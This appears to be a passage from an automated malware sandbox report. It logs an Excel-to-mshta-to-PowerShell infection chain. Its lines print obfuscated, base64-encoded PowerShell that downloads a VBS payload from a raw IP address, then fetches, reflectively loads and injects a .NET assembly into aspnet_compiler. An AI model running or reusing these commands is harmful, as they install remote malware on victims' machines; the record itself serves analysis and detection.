Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZy